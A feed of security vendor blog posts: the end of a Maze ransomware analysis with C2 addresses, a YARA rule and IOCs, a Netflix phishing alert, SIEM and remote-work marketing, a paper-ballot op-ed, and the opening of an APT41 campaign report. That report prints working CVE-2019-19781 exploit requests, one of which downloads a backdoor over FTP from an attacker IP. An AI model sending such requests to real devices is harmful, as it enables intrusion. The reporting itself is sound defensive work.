hxxp://91.218.114.37/imrhhjitop.phtml?wto=344dsc84&sp=x&oml=c173s71u&iy=m3u2

hxxp://91.218.114.38/auth/login

hxxp://91.218.114.79/logout/hfwdmugdi.php?upaj=mj7g

hxxp://91.218.114.38/sepa/juel.php?ars=51qse4p3y&xjaq=r5o4t4dp

hxxp://91.218.114.32/fwno.cgi?yd=410&o=y7x5kx371&p=m3361672

hxxp://91.218.114.37/sepa/signout/mjsnm.aspx?r=7o47wri&rtew=uu8764ssy&bri=51gxx6k5&opms=72gy0a

hxxp://91.218.114.77/payout/analytics/lrkaaosp.do?y=62h&aq=3jq8k6&v=0svt

hxxp://91.218.114.79/create/dpcwk.php?u=28qy0dpmt&qwbh=k&f=g1ub5ei&ek=3ee

 

It is important to take into consideration that the malware forges the POST string to make the connection with a random choice from a list of possible strings such as “forum”, “php”, “view”, etc., to make detection harder with IPS or other filters on the network.

The IP addresses are detected as from the Russian Federation but that does not prove that the malware came from this country; it could be deliberate misdirection but, with the language checks of CIS countries, it certainly appears possible.

The use of IP addresses instead of domain names is to avoid DNS resolutions that can be altered or redirected to a loopback, for example using the “host” file in Windows. This makes the trace of IPs more complicated and avoids having the connection blocked.

The malware uses this agent to make the connection, but it can change between samples:

FIGURE 25. AGENT USED TO MAKE CONNECTIONS TO THE C2C IP ADDRESSES

From a memory dump we can extract the IPs used by these connections, as well as a curious string that talks about Lawrence Abrams, the admin of the web site “bleepingcomputer” who was contacted directly by the developers. It is not known why they included this email address because it has no relation to the ransom note and is not used anywhere else. Perhaps it is a means of mocking the administrator of a site that frequently reports on ransomware?

FIGURE 26. C2C IP ADDRESSES EXTRACTED FROM THE MEMORY

The connections to the C2C IP addresses, in a pcap using Wireshark, can be seen perfectly:

FIGURE 27. CONNECTION IN PCAP WITH THE C2C IP ADDRESSES

Maze has some strings in memory that are interesting and something that may be worth further analysis in the future:

FIGURE 28. CURIOUS STRING FOR FUTURE INVESTIGATION

The webpage for making the payment requested in the ransom note gives a price and verifies that all is correct.

FIGURE 29. MAZE PAYMENT WEBPAGE AFTER DECRYPTING THE RANSOM NOTE

Maze has a chat function to contact the operators and receive information about how to obtain the cryptocurrency required to make payment.

Of course, as with many types of ransomware, there is an offer to decrypt three images for free and that service has been verified as working:

FIGURE 30. FREE DECRYPTION WORKS SO THE MALWARE SAMPLE IS CORRECT

SWITCHES

The malware has some switches that can be used in the command line to launch. These switches can either disable some elements or enable logging.

The switches are:

  • –nomutex -> This switch prevents checking the mutex so that it can run more than one instance on the same machine. It can also be used to avoid vaccines that are made before the malware creates the mutex name in the machine.
  • –noshares -> With this switch the malware will not crypt network shares, only the local machine.
  • –path x -> Where x is a full path. In this case the malware will crypt all files in all folders starting from this path unless they are blacklisted names, extensions or folder names. This is useful for the malware developers to attack a special path instead of losing time going after a full machine and it makes the attack more targeted.
  • –logging -> If this switch is enabled the malware will log all the steps it makes. Useful to the malware developers in debug environments, or in the attack phase to know that all was ok, step by step. Here is a small example of this information:

FIGURE 31. EXAMPLE OF THE INFORMATION THAT THE MALWARE CAN GIVE WITH THE LOG SWITCH

OTHER SAMPLES

In January 2020 a new version of the malware appeared with a special text dedicated to some researchers in the security field. The malware developers appear to have chosen those individuals to be provocative and make fun of them.

The sample was discovered by malwrhunterteam[9] on the 28th of January 2020. The sample has some differences when compared with the previous one that was analyzed in this report. Those differences will be covered later via another sample that was found by Luca Nagy[10] on the 30th of January 2020.

The most important thing here is that the developers appear to have carefully selected the researchers and waited for them to answer as a psychological trick, and it worked, because all of them replied, trolling the malware developers over the version of their malware detected on the 28th.

Here is one response from a malware developer to this trolling that contains some interesting facts:

FIGURE 32. RESPONSE FROM A MALWARE DEVELOPER

  • It is not known if one person is behind the malware or not. It is curious that they said “I” instead of “we” twice in their answer. So, perhaps it was written by one person for trolling purposes, or perhaps the developer of the malware really is only one person (or they want researchers to think that is the case).
  • Another important fact in the note is the talk about the tools used by one of the researchers for regular malware analysis. Why are they mentioning regular malware analysis? Is it because they are reversing malware themselves for fun or could it be their day job? Could it be that perhaps the developer is a researcher (because of the way that they talk with others and provoke them)? Secondly, malware analysis is mentioned more than once and, thirdly, they said that they made an IDAPython script to remove all obfuscated code that the malware has (the ransomware may have got the name ‘Maze’ because of how analysis of it is like walking through a labyrinth). So, it may be either a researcher who knows IDAPro very well or is an advanced developer (and the obfuscated code in Maze is very well done) or perhaps it is a developer that has another job in normal life besides the creation of malware? Of course, these are just possibilities, not facts.
  • The malware developer achieved their goal with this interaction as their target audience saw the answer and talked about their malware, as noted in the final line of their response “ …but you need to know that we love you researchers without you our job also would be fuc**** boring as hell”.

It is curious that here they said “we” instead of “I” as before but perhaps they were talking about all malware development?

The differences that these samples have are:

  • Usually comes as a DLL instead of an EXE file. It does not run on Windows operating systems older than Vista as this makes analysis harder. By using the malware as a DLL, they can inject this module into a target process more easily than if they use an EXE sample of the malware.
  • Instead of deleting the “Shadow Volumes” the developers instead use WMIC with the special trick of the path as mentioned earlier, using WMIC classes to control the Shadow Volumes. An example of this use can be seen in the next image.

FIGURE 33. USING WMIC CLASSES IF NEEDED TO GET THE SHADOW VOLUMES

Each sample of the malware uses different strings as PDB to send messages or to make the sample unique, for example:

  • C:\somerandomsh**\sh**\obama.pdb
  • C:\kill\yourself\<nickname>\chinese\idio*.pdb

(In these examples some things were removed or changed to remove sensitive information in the report).

The new samples discovered in January 2020 make these connections to the C2 (or try to make them):

FIGURE 34. CONNECTIONS TO C2 IP OF THE NEW SAMPLES

As we can see, they are the same IPs as seen in the previous versions of the malware.

The samples’ compile dates are from the 24th of January 2020 (the first version with the strings that provoked the researchers) to the 28th of January 2020 (the version with the answers to the researchers), meaning they were made on the same day the responses to the previous version were published on Twitter.

Another interesting fact from the later sample is that, besides it saying that the language code used to program it was Korean, the IPs where it connects belong to the Russian Federation as before, as can be seen in the next two images.

FIGURE 35. LANGUAGE CODE “USED” IN THE PACKER SAMPLE, NOT THE MALWARE

FIGURE 36. ALL C2 DOMAINS BELONG TO THE RUSSIAN FEDERATION

It is impossible to know the truth, but this could be a trick to try misleading researchers into thinking that the malware comes from some country when in truth it originates in another. It is known that malware developers often check the language on potential victim’s machines to avoid the CIS countries, so we can guess that the check for the “Korean” language was a trick designed to mislead, but it is impossible to know that for sure. Of course, the “Korean” language can be changed manually, or it could be a Korean packer, but it is impossible to say with certainty.

CONCLUSION

Maze is a ransomware created by skilled developers. It uses a lot of tricks to make analysis very complex by disabling disassemblers and using pseudocode plugins.

It poses a big problem to individuals and enterprises that do not pay as the developers threaten to release the information if they do not receive payment and they do indeed keep their word on that. More and more ransomwares are exhibiting the same behavior and we expect to see more of it this year and perhaps further into the future too.

The malware developers are active on social media sites, such as Twitter, and they are familiar with the work of malware researchers. They also know how to provoke them perfectly and they like to play cat and the mouse with them.

We recommend making periodic backups of files and keeping them isolated off the network and having an always updated antivirus in place. The latest software patch should also be applied. Remote Desktop Connections that are not needed should be avoided.

Avoid suspicious emails and do not open attachments that come from anyone that you do not know. The same goes for links in emails and, even if they come from a known source, check with the sender if you have any doubts. Also, disable macros in Office programs and never enable them unless it is essential to do so.

COVERAGE

McAfee protects against this threat in all its products, including personal antivirus, endpoint and gateway.

The names that it can have are:

  • Ransom-Maze!<hash>

YARA RULE

rule maze_unpacked {

   meta:

      description = “Rule to detect unpacked Maze samples”

      author = “Marc Rivero | McAfee ATR Team”

    

   strings:

      $opcode_sequence = { 5589e583ec208b450c8b4d08c745fc00 }

 

                  $opcode_sequence_2 = { 5589e553575683e4f883ec28c7042400 }

 

                  $opcode_sequence_3 = { 5589e55dc3662e0f1f84000000000090 }

 

                  $opcode_sequence_4 = { 5589e553575683e4f081ec600200008b }

 

                  $opcode_sequence_5 = { 5589e553575683e4f081ecc00000000f }

 

                  $opcode_sequence_6 = { 5589e583ec208b45108b4d0c8b550883 }

 

                  $opcode_sequence_7 = { 5589e5575683ec388b45108b4d0c8b55 }

 

                  $opcode_sequence_8 = { 5589e5575683e4f883ec088b45088b48 }

 

                  $opcode_sequence_9 = { 558b6c241468997a41000f84bdc50000 }

 

                  $opcode_sequence_10 = { 5589e553575683e4f883ec588b5d088b }

 

                  $opcode_sequence_11 = { 5589e553575683e4f083ec408a42048b }

 

                  $opcode_sequence_12 = { 5589e583ec188b4508837d08008945fc }

 

                  $opcode_sequence_13 = { 5589e553575683e4f8b8d05b0000687f }

 

                  $opcode_sequence_14 = { 5589e5508b450831c98945fc89c883c4 }

 

                  $opcode_sequence_15 = { 5589e553575683e4f883ec708b5d0889 }

                 

                  $opcode_sequence_16 = { 5589e583ec308b45088b4d08894df883 }

 

                  $opcode_sequence_17 = { 5589e553575683e4f881ec18030000f2 }

 

                  $opcode_sequence_18 = { 5589e583ec188b45088b4d08894df48b }

 

                  $opcode_sequence_19 = { 5589e583ec2056be74c14400566a0068 }

 

                  $opcode_sequence_20 = { 5589e553575683e4f081ec900000008b }

 

                  $opcode_sequence_21 = { 5589e583e4f083ec208b4d108b450c0f }

 

                  $opcode_sequence_22 = { 5589e55383e4f883ec108b4d0c8b4508 }

 

                  $opcode_sequence_23 = { 558b8e150409133f03fd08f81b0c4f22 }

 

                  $opcode_sequence_24 = { 5589e553575683e4f883ec7031f68379 }

 

                  $opcode_sequence_25 = { 5589e553575683e4f881ec3001000089 }

 

                  $opcode_sequence_26 = { 5589e553575683e4f881ece00000000f }

 

                  $opcode_sequence_27 = { 558b589608361d1943a57d0ba6492beb }

 

                  $opcode_sequence_28 = { 5589e553575683e4f883ec1089ce6a00 }

 

                  $opcode_sequence_29 = { 5589e5575683e4f883ec688b75088b7d }

 

                  $opcode_sequence_30 = { 5589e553575683e4f883ec386a006a00 }

 

                  $opcode_sequence_31 = { 558b7c240868dca8440057683d484300 }

 

                  $opcode_sequence_32 = { 5589e55683e4f881ec2801000089ce8d }

 

                  $opcode_sequence_33 = { 5589e583ec188b450831c98b5508c704 }

 

                  $opcode_sequence_34 = { 5589e583ec308b450c8b4d088b55088b }

 

                  $opcode_sequence_35 = { 5589e583ec348b450831c983c1188b55 }

 

                  $opcode_sequence_36 = { 5589e553575683e4f881ec78040000f2 }

 

                  $opcode_sequence_37 = { 5589e583ec108b4508837d08008945f8 }

 

                  $opcode_sequence_38 = { 5589e583ec348b4508837d08008945dc }

 

                  $opcode_sequence_39 = { 5589e55683ec548b45088b4d08894df0 }

 

                  $opcode_sequence_40 = { 558bec5de9a48efeffe9ef8efeffcccc }

 

                  $opcode_sequence_41 = { 5589e553575683ec108b45108b4d0c8b }

 

                  $opcode_sequence_42 = { 5589e5575683ec348b4508c745f40100 }

 

                  $opcode_sequence_43 = { 558bec8325a0c345000083ec1c5333db }

 

                  $opcode_sequence_44 = { 5589e553575683e4f083ec208b750c0f }

 

                  $opcode_sequence_45 = { 5589e583ec348b450c8b4d088b55088b }

 

                  $opcode_sequence_46 = { 558b6fd8d843ef516154e2526781aecd }

 

   condition:

 

      ( uint16(0) == 0x5a4d) and 38 of them

}

IOCs

Network

Domain          mazedecrypt.top

IP                     91.218.114.11

IP                     91.218.114.25

IP                     91.218.114.26

IP                     91.218.114.31

IP                     91.218.114.32

IP                     91.218.114.37

IP                     91.218.114.38

IP                     91.218.114.4

IP                     91.218.114.77

IP                     91.218.114.79

MITRE ATT&CK COVERAGE

  • CommonlyUsedPort
  • StandardApplicationLayerProtocol
  • SecuritySoftwareDiscovery
  • SystemTimeDiscovery
  • CommandLineInterface
  • DataEncrypted
  • DataEncryptedForImpact
  • Query registry
  • Hooking

[1] https://twitter.com/jeromesegura/status/1133767240686288896

[2] https://www.bleepingcomputer.com/news/security/maze-ransomware-demands-6-million-ransom-from-southwire/

[3] https://www.bleepingcomputer.com/news/security/nemty-ransomware-to-start-leaking-non-paying-victims-data/

[4] https://twitter.com/McAfee_Labs/status/1206651980086685696

[5] https://www.bleepingcomputer.com/news/security/new-threat-actor-impersonates-govt-agencies-to-deliver-malware/

[6] https://securityintelligence.com/news/spelevo-ek-exploits-flash-player-vulnerability-to-deliver-maze-ransomware/

[7] https://github.com/revsic/AntiDebugging

[8] https://ss64.com/locale.html

[9] https://twitter.com/malwrhunterteam/status/1222253947332841472

[10] https://twitter.com/luca_nagy_/status/1222819371644522500

The post Ransomware Maze appeared first on McAfee Blogs.

SECURITY ALERT: New Netflix Phishing Campaign Detected

A new Netflix phishing campaign was brought to my attention so I decided to share the news with all of you. It’s true that are more pressing matters to be worried about in the times we’re living through. Healthcare systems are under attack by malicious groups as well and company IT systems are having a hard time coping with mass remote work.

But still, smaller phishing campaigns such as this new one for Netflix should not go by unseen and unreported. Especially since many of you might create Netflix accounts for the first time right now.

Reports of Increased Phishing Activity Across All Mediums

We had intelligence that phishing and spear-phishing scams are experiencing a slow rise since the end of last year, but 2020 saw a sharp spike. Coronavirus fears are sadly seen as an opportunity to take advantage of by malicious groups worldwide. Therefore, there’s a huge surge in phishing campaigns across the board, some of them COVID-19 themed and some of them not.

Even when they are not explicitly using the Coronavirus fears as a phishing pretext, hackers definitely know what they are doing. A side effect of the pandemic is this widespread societal and cultural transformation that we are all living through. Swarths of people are working remotely and spend almost all of their time indoors.

This means two things. One is that people are creating more accounts for platforms they can use while at home. Hence hackers can use this pretext of a new account as a phishing technique, like in the new Netflix phishing campaign that we discovered. The second is that people are still getting accustomed to working from home, which again means more opportunities for phishing and other security risks.

How the New Netflix Phishing Campaign Looks Like

screenshot of netflix phishing campaign

This email is obviously part of a greater scam, involving phone calls as well. The ideal victim of this new Netflix phishing campaign picks up the phone and calls the phony support line stated in the email.

If the user does not and simply clicks on the Help Center link listed in the email, they will be redirected to the legit Netflix Help Center. Unfortunately, during these times, the portal might display notifications such as these:

screenshot of netflix help center

That might prompt users to try again, only succeeding in getting in touch with the malicious parties who set up the Netflix phishing campaign. It’s not the first time support phone numbers were actually used for scams.

Netflix Users Are Especially a Target in Times of Remote Work and Quarantine

Since the COVID-19 pandemic started and people started spending much more time indoors, the usage of internet streaming services spiked up. So much so that YouTube and Netflix both announced that they are reducing their video streaming quality across Europe.

But this is obviously not a deterrent to people who are stuck at home and dealing with all the worries that these times are bringing. More and more users are creating Netflix accounts since the pandemic started and the trend doesn’t show signs of slowing down. No wonder the service (and similar ones) are forced to reduce the video quality until they figure out how to cope.

Unfortunately, this also means more phishing. Even emails shot in the dark, as these most likely are, have a high chance of landing on a target. When many people are creating an account, a Netflix phishing campaign pretending to respond to account creation is much more believable.

How to Stay Safe from the New Netflix Phishing Campaign

Whatever email you are receiving from Netflix (or beyond), remember that no legit website will ask for your credentials. No matter how good their grammar is, an email is surely a phishing attempt if you are redirected to a page where you’re asked for your login details.

So, don’t fill in anything sensitive (email address, passwords, etc.) and just close the tab. Ignore the email.

Unfortunately, some malicious emails are more sophisticated than this Netflix phishing campaign. In some cases, you can get your device infected simply by clicking the wrong malicious link, even if you’re not entering any credentials. For that kind of threat, a DNS filter is what you need.

You can try our all-in-one solution for home users, Thor Premium Home for one month and see how it fits. It contains Antivirus, the DNS filter which blocks unknown threats (like malicious links) and an auto-updater for software.

Thor Foresight makes sure that link is safe!
Your parents and friends will click any suspicious link, so make sure they're protected.
Thor Foresight Home anti malware and ransomware protection heimdal security
Thor Foresight provides: Automatic and silent software updates Smart protection against malware Compatibility with any traditional antivirus.

SECURE YOUR ONLINE BROWSING!

Get Thor Foresight

We’re living interesting times, as one of my favorite authors would have said. Stay safe and don’t click suspicious links!

 

 

The post SECURITY ALERT: New Netflix Phishing Campaign Detected appeared first on Heimdal Security Blog.

How to Protect Your Business Against Common Cybersecurity Threats with SIEM

Undefined

Organizations today may have a false sense of security when it comes to the security of their own environments. In fact, there are numerous ways companies make it easier for threat actors to gain access into their systems undetected. To complicate matters even further, the sheer volume of threats companies face makes it impossible to uncover security events quickly—even if many are benign.

By better understanding what and where the challenges are, organizations can be better equipped to find solutions that help them combat these threats. This blog will explore some of the common security challenges that exist within organizations today and then examine how Security Information and Event Management (SIEM) solutions can enable companies to prioritize, prevent, and address ongoing cybersecurity threats.  

How Are Companies Unintentionally Putting Themselves at Risk?

In today’s dynamic landscape, there are a number of cybersecurity threats organizations regularly face that they may not even be aware of, including malicious insider attacks, inadvertent insiders, excessive access, misconfigurations, and brute force attacks. Let’s take a brief look at each of these:

  • Malicious Insider Threats: This type of threat occurs when an individual, like a disgruntled employee or someone who has recently been let go, still has access to data and applications within an organization. The person may then try to steal information on behalf of outsiders or for personal gain.
     
  • Inadvertent Insiders: Insider threats from inadvertent insiders typically happen through phishing, poor passwords, spear-phishing, and orphaned accounts. This means someone in the organization has made a mistake doing something that they did not intend to, but has caused some form of threat or damage.
     
  • Excessive Access: This type of challenge occurs in organizations when individuals have more access than they need, caused through rubber stamping access approvals, overprovisioning, or changing job roles in the organization. Frequently, this occurs when organizations do not adhere to the principle of least privilege and there are privilege access violations of policies. It is critical to monitor the organizational environment for changes to user profiles, invalid login attempts, and other intrusion detections.
     
  • Misconfigurations: Misconfigurations are a common threat within organizations and can pose a serious security threat. In fact, according to Gartner, 95 percent of firewall breaches are caused by firewall misconfigurations, not firewall flaws themselves. Simple configuration changes can allow significant access to systems if they are not done correctly.
     
  • Brute Force Attacks: This type of threat is occurring more and more often. Not only does it occur when threat actors are simply jamming passwords until they guess the correct one, it also happens when an automated tool is used to crack passwords. Many automated password crackers can generate billions of guesses per minute. So if individuals are not creating complex passwords, limiting the number of times people can log in, or locking out users who exceed the number of failed log in attempts, it can open your organization for potential breaches that you may not be aware of.
     

How Does a SIEM Solution Address These Major Cybersecurity Threats?

The types of cybersecurity threats described here represent major challenges for organizations that have limited visibility into their environments. So how do you really know what could be the biggest threat to your infrastructure? And how can you more easily recognize what you need to address out of the thousands of potential events that happen each day?

The answer is through a Security Information and Event Management (SIEM) solution that provides real-time threat detection and prioritization. With all the data sources coming in, whether it’s from hardware, from a software application, from an operating system, or from a database engine, an effective SIEM solution gathers all this relevant data, brings it into a single system where the data can be centralized, and then provides it in a view that is easy to see and easy to understand.

Prioritize and Remediate

Let’s face it, companies today are unable to manually validate the thousands of alerts they receive each day, so they need to have intelligence to help prioritize and make decisions. With a SIEM, you can tailor and personalize alerts that are most important to you. And if you find something that is not relevant, you can remove it from alerting you again in the future.

Being able to compare data also makes it easier for security teams to understand how things are progressing inside of their environments, and gives them a better way to manage and maintain those systems and solutions over time. This means you get an instant warning with critical information you can use to protect your environments, enabling your organization to investigate and remediate.

What does this actually look like? With automated escalation, notifications are rapidly sent to exactly the right security team members when a threat requires action, allowing them to quickly prevent or neutralize risks. This means your security teams and analysts can determine in real-time if they need to go and investigate further. If it’s determined an event was bad, a course of action can be taken to work the issue to resolution.
 

Take Your Next Step

If you are ready to understand where your greatest challenges are and prioritize potential threats across your organization, then it’s time to take the next step and learn about the right SIEM solution for you. Event Manager from Core Security identifies, records, and prioritizes incidents across your organization, reducing alert fatigue by only generating alerts when needed. Start protecting your business against common cybersecurity threats using SIEM today.

protect-with-SIEM-700x350.jpg

protect-with-SIEM
SIEM
Big text: 
Blog
Resource type: 
Blogs
See Event Manager in Action. Try it. And Test it.

See all the ways a SIEM can mitigate threats in your business. Start by watching a live demo of Event Manager.
Then see if you want to trial a full version or test out our freemium version, too.

Four Network Security Challenges for Organizations with a Remote Workforce

English

Recently, the need for being able to work remotely has dominated the news, making it clear that the ability to connect from anywhere may soon become the norm for more businesses and industries than ever before. While remote work may be coveted by many employees, it can easily fill your cybersecurity team with dread. Telework can create many new security weaknesses for an IT environment, and can significantly increase your organization’s chance of a devastating data breach. Read on to find out what makes these new network connections so vulnerable, and how you can reduce your risk.

 1. A Rapidly Extending Perimeter to Secure

Businesses with onsite employees and workstations used to have an easily identifiable security perimeter—the building in which the office was located, and the network IT teams set up there. The cloud expanded the perimeter, but the majority of connections to the cloud were from different branches of the business, which were still located in traditional office spaces that could be secured and centrally managed.

With remote work, the perimeter has the potential to be virtually limitless, widening to each remote employee’s own router and wifi. Securing each one of those new individual connections is a nearly impossible task. Additionally, since security teams can’t verify how employees are managing their own networks, a remote workforce can mean that every remote worker may also soon be an attack vector.

Planning to implement a remote workforce requires careful consideration, additional resources, and typically a deployment that occurs in phases. Even then, not all security issues may be preventable. Having to quickly adapt to a remote workforce in an emergency, with limited resources, presents even more challenges.

2. Insecure Configurations

As mentioned above, security teams can’t control how individuals choose to connect to the network. While home office configurations have gotten increasingly sophisticated, their initial configuration may not be the most secure. For example, many wifi networks permit remote administration by default, which can serve as a primary vector for attackers. Some remote workers also use their own laptop, which may not be as securely set up than one provided by your IT team.

Additionally, though people may be primarily conducting remote work at home, particularly during an emergency, some may be traveling for business or could choose to go to coffee shops or libraries. While complimentary wifi is convenient, these connections are public and are very rarely properly secured, making them incredibly easy to exploit.

3. Connecting Personal Devices to the Network

Even those with work laptops and a relatively secure home setup may unknowingly be posing a risk to their organization. Once your home network is connected to your work network, so are all of your other devices—from your spouse’s tablet to a gaming console, and even your printer—all of which may not be properly protected. Every one of these devices can be compromised by an attacker, and used as a way into your work computer, exploiting your secure connection to gain entrance into organizational systems and data.

4. Episodic Increases in Malicious Activity

Finally, any time there is a crisis, regionally or globally, threat actors quickly mobilize, using phishing and other scams to take advantage of heightened emotions and the impulsive, reactive behavior that is common during such times.

When the waters are calm, threat actors have to be strategic in their phishing attempts. They can send out mass emails that don’t take much time to make, knowing users are much less likely to click on them because they are generic and tend to get caught in spam filters or quickly raise suspicion. Or they can use tactics like spear phishing, sending tailored emails intended for specific individuals or groups. Fewer emails are sent, but the likelihood that they will be opened is much higher.

However, when things are unstable, attackers can exploit the anxiety people are experiencing, transforming desperation for information into clicks. Attackers don’t need to spend time creating tailored emails for specific individuals when there is a topic that everyone is highly interested in. Threat actors can have the best of both worlds—they can cast a wide net, with the click rate of a targeted attack. Because crises can temporarily blind typically discerning eyes, it is extremely difficult to prevent such attacks.

Reduce Risk with Intelligent Monitoring and Detection

Remote work seems to open seemingly endless new connections to an organizational network, whether deliberately with a secure work laptop, or inadvertently with insecure connections and devices. While your security team can act preventatively by requiring passwords and VPN, there are still too many variables. By taking the zero-day approach to security, organizations have the mindset that they will at some point be breached, and should layer security accordingly. This means that it is also necessary to also go on the defensive, focusing on constant monitoring and detection.

But how do you keep up with this web of connections without drastically increasing the size of your security team? Instead of monitoring the network, advanced threat detection solutions like Network Insight monitor the traffic, looking for and confirming malicious activity, ensuring that swift action can be taken the moment it is identified. This way, your organization is being monitored without disruption, and connections can constantly be added and removed. In most cases, additional headcount is unnecessary, since such a solution carefully analyzes any threat, confirming and prioritizing infections to ensure security teams are equipped with all the evidence they need.

One Core Security customer has already seen the advantages of advanced threat detection after having to quickly move to remote work in recent weeks. While they were using their VPN as a secure connection, they had Network Insight installed to monitor that link.  Within 12 hours, there were five threats detected, which illustrates the heightened malicious activity of the current moment. With such rapid detection and notification, this customer was able to thwart each attack, and suffered no damage.

Even with these security challenges, remote work is a great way to meet the needs of your employees, and makes your organization more adaptable and resilient. By understanding the risks and implementing the right processes and tools, your security can be up to the task and equally durable.

 

cs-preventing-ransomware-with-a-remote-workface-700x350.png

Network Security Challenges for Organizations with a Remote Workforce
Network Insight
Big text: 
Blog
Resource type: 
Blogs
Want to learn about advanced threat detection?

Read our guide How to Identify Compromised Devices with Certainty, to learn how to avoid the fallout of a breach by swiftly confirming infection with evidence based analysis.

COVID-19 & Voting: When Paper is the Safest Election Technology

There are concerns that the COVID-19 pandemic will discourage voters from turning out to vote in person for this year’s U.S. presidential primaries and general election.  State governments are considering alternative voting processes to protect voters and election officials from infection at the polls.

As strange as it may sound coming from a CTO, I advise that they utilize vote-by-paper ballots rather than rush to implement a website or mobile app-based voting system. This has as much to do with the lack of resources and technical expertise of local governments as it does with the lack of confidence voters will have in digital-online voting.

Paper ballots are the most trustworthy voting technology because it is difficult to manipulate them at scale. On the other hand, digital voting through a website or a mobile app brings with it not only the possibility of user error, but also the possibility that a cyber campaign using malware or other techniques could manipulate or change citizens’ votes at scale with greater ease.

Some of the techniques that malware uses today, such as in banking fraud, allows the user to type in their credentials (or their authorization key) and makes it look like the user performed the transaction that they intended. With the user’s credentials or transaction code, the malware could perform a different transaction, such as transferring funds to the attacker’s account.

This same issue is present in a voting application or website.  The voter could cast a vote, it would appear to reflect their intended selections, but the vote actually sent to the backend could go to the other candidate.

Unlike a banking application where the user would eventually see the fraudulent transaction in their account statement, in an election, the only result would be the total vote count, and it would not be obvious that a manipulation had occurred. Even national-ID or smartcard credentials don’t help in this type of attack, given that the attack occurs after the user has authenticated to the back-end system.

Additionally, wherever voting machines are used, there must be a paper record or receipt of votes cast to enable election officials to audit their election vote counts. This also enables the voters to have proof their vote was recorded properly.

Some may argue that malicious actors could attempt a counterfeit paper ballot fraud at scale, but the fact is that many states have already established anti-counterfeit paper ballot design standards to counter such efforts. The best of these practices should be adopted wherever the paper ballot becomes the standard voting mechanism in 2020.

Others may argue that a fully digital voting process will protect election board processors that might otherwise contract coronavirus from tabulating the paper ballot votes. But a recent study cited by CDC asserts that the virus can survive on paper or cardboard for only 24 hours. If the U.S. or other countries decided to go to a pure paper ballot format, election officials could either have voters send their ballots through the United States Postal Service or set up drive-through stations where voters could simply walk or drive by and drop their ballots through a submission slot themselves. Then the processors could augment basic protective measures such as wearing gloves with an extra time delay of 24 hours from receipt to minimize risk of transmission.

Another consideration is that local election officials are challenged in securing the basic information systems for voting, such as the websites with information about election process. McAfee’s recent analysis of U.S. local government election security practices showed that 83.3% of battleground state election websites were not using .gov domains and 46.6% were not using https security.  It’s unreasonable to assume that a high integrity digital voting system can be developed in a few months when even the basic cyber hygiene practices are lacking in existing election systems.

Technology should certainly be used in the automation of scanning and recording the votes of paper ballots, as those systems are well proven and leave election administrators a paper record that allows them to audit and verify that there is no manipulation.

Finally, we must make sure that every voter has the ability to vote. Where appropriate, states and local governments need to relax the criteria for remote voting to allow all eligible voters in the country to vote by mail.

In times of a global pandemic, the trust of the public in its government is more critical than ever. Paper may be a 2,000-year-old technology, but ordinary citizens understand and trust paper.  Voters must have faith that their vote will be counted and honored. Given that there are increasing levels of inherent distrust in political systems, we must use the technology that is a trusted common denominator by the broadest swath of the electorate. Ironically, paper is that technology in 2020.

 

 

 

 

The post COVID-19 & Voting: When Paper is the Safest Election Technology appeared first on McAfee Blogs.

The Power of Community – PancakesCon 2020: Quarantine Edition

Like many industries, the cybersecurity community is full of smart, dedicated, and curious people that deliver surprising results in unusual times. When presented with unique circumstances and limitations, these minds start finding creative and innovative ways to not only maintain the norm, but often to advance it. There is no more recent and shining example of this than PancakesCon 2020: Quarantine Edition.

This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits

Beginning this year, FireEye observed Chinese actor APT41 carry out one of the broadest campaigns by a Chinese cyber espionage actor we have observed in recent years. Between January 20 and March 11, FireEye observed APT41 attempt to exploit vulnerabilities in Citrix NetScaler/ADC, Cisco routers, and Zoho ManageEngine Desktop Central at over 75 FireEye customers. Countries we’ve seen targeted include Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, Philippines, Poland, Qatar, Saudi Arabia, Singapore, Sweden, Switzerland, UAE, UK and USA. The following industries were targeted: Banking/Finance, Construction, Defense Industrial Base, Government, Healthcare, High Technology, Higher Education, Legal, Manufacturing, Media, Non-profit, Oil & Gas, Petrochemical, Pharmaceutical, Real Estate, Telecommunications, Transportation, Travel, and Utility. It’s unclear if APT41 scanned the Internet and attempted exploitation en masse or selected a subset of specific organizations to target, but the victims appear to be more targeted in nature.

Exploitation of CVE-2019-19781 (Citrix Application Delivery Controller [ADC])

Starting on January 20, 2020, APT41 used the IP address 66.42.98[.]220 to attempt exploits of Citrix Application Delivery Controller (ADC) and Citrix Gateway devices with CVE-2019-19781 (published December 17, 2019).


Figure 1: Timeline of key events

The initial CVE-2019-19781 exploitation activity on January 20 and January 21, 2020, involved execution of the command ‘file /bin/pwd’, which may have achieved two objectives for APT41. First, it would confirm whether the system was vulnerable and the mitigation wasn’t applied. Second, it may return architecture-related information that would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step.  

One interesting thing to note is that all observed requests were only performed against Citrix devices, suggesting APT41 was operating with an already-known list of identified devices accessible on the internet.

POST /vpns/portal/scripts/newbm.pl HTTP/1.1
Host: [redacted]
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.22.0
NSC_NONCE: nsroot
NSC_USER: ../../../netscaler/portal/templates/[redacted]
Content-Length: 96

url=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `file /bin/pwd`') %]

Figure 2: Example APT41 HTTP traffic exploiting CVE-2019-19781

There is a lull in APT41 activity between January 23 and February 1, which is likely related to the Chinese Lunar New Year holidays which occurred between January 24 and January 30, 2020. This has been a common activity pattern by Chinese APT groups in past years as well.

Starting on February 1, 2020, APT41 moved to using CVE-2019-19781 exploit payloads that initiate a download via the File Transfer Protocol (FTP). Specifically, APT41 executed the command ‘/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd’, which connected to 66.42.98[.]220 over the FTP protocol, logged in to the FTP server with a username of ‘test’ and a password that we have redacted, and then downloaded an unknown payload named ‘bsd’ (which was likely a backdoor).

POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Accept-Encoding: identity
Content-Length: 147
Connection: close
Nsc_User: ../../../netscaler/portal/templates/[redacted]
User-Agent: Python-urllib/2.7
Nsc_Nonce: nsroot
Host: [redacted]
Content-Type: application/x-www-form-urlencoded

url=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd`') %]

Figure 3: Example APT41 HTTP traffic exploiting CVE-2019-19781

